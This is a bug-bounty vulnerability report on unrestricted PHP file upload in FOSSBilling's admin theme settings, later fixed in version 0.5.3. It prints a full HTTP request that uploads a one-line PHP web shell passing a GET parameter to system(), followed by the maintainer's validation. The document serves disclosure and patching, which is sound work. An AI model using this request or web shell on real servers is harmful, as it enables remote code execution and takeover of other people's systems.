We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Remote Code Execution via File upload in fossbilling/fossbilling

Valid

Reported on

Jun 29th 2023

Description

In the theme settings function, any file can be uploaded without any filter, resulting in an arbitrary php file being uploaded.

Proof of Concept

POST /admin/theme/huraga HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------382348652630811262464163010367
Content-Length: 8095
Origin: http://localhost
Referer: http://localhost/admin/theme/huraga
Cookie: XDEBUG_SESSION=XDEBUG_ECLIPSE; PHPSESSID=63tt4112tgk75t8kl9viq1hfl6

-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="CSRFToken"

fc49506212203e218932933eea6c6675
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="color_scheme"

green
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="show_page_header"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="show_company_logo"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="show_company_name"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="show_client_details"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="sidebar_balance_enabled"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="top_menu_dashboard"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="top_menu_order"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="top_menu_profile"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="top_menu_signout"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="login_page_show_logo"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="login_page_logo_url"

/
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="show_password_reset_link"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="show_signup_link"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="login_page_show_remember_me"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="show_breadcrumb"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="hide_dashboard_breadcrumb"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="require_login"

0
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="showcase_enabled"

0
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="showcase_size"

3
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="showcase_text"

## The showcase text is markdown enabled
So you can use features like ~~strike-through ~~

Additionally, you can use things like lists
 - List item 1
 - List item 2

What's that? You don't want to have a button / link?

Then just make it blank and FOSSBilling will automatically hide it!
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="shell.php"; filename="ahihi.php"
Content-type: application/x-php

<?php

system($_GET["cmd"]);

?>
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="showcase_button_title"

Showcase button title
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="showcase_button_url"

Showcase link URL
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_dashboard"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_order"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_support"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_services"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_invoices"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_emails"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_payments"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_news"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_kb"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="sidebar_note_enabled"

0
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="sidebar_note_title"

Note title
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="sidebar_note_content"

Note content
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="meta_title"


-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="meta_description"

Members area
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="meta_keywords"

members area
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="meta_robots"

index, follow
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="meta_author"

FOSSBilling
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_enabled"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_to_top_enabled"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_signature"


-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_1_enabled"

on
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_1_title"

About us
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_1_page"

about-us
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_2_enabled"

on
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_2_title"

Terms and conditions
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_2_page"

tos
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_3_enabled"

on
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_3_title"

Privacy policy
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_3_page"

privacy-policy
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_4_title"


-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_4_page"


-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_5_title"


-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_5_page"


-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="inject_javascript"


-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="save-current-setting-preset"


-----------------------------382348652630811262464163010367--

PoC Image

image

Impact

Remote Code Execution

Occurrences

We are processing your report and will contact the fossbilling team within 24 hours. 3 months ago
Nhien.IT modified the report
3 months ago
fossbilling/fossbilling maintainer has acknowledged this report 3 months ago
Belle Aerni
3 months ago

Maintainer

Your image isn't loading, and the impact / title claims remote code execution, however it doesn't seem like you've actually indicated a way to execute the uploaded file?

Nhien.IT modified the report
3 months ago
Belle Aerni validated this vulnerability 3 months ago

Thanks!

Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Belle Aerni
3 months ago

Maintainer

The upload function is being completely removed in this pull request, which will resolve this: https://github.com/FOSSBilling/FOSSBilling/pull/1392

Belle Aerni marked this as fixed in 0.5.3 with commit 2ddb74 3 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Jul 1st 2023
Admin.php#L66 has been validated
Belle Aerni published this vulnerability 3 months ago
to join this conversation